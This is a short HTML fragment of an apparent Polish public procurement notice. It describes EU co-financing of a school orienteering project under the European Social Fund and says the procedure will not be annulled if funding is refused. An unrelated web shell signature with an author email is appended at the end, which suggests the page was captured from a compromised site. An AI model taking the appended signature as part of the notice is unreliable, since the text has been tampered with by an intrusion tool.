<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn.: Bieg na orientację - orientuj się w życiu współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach Działania 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com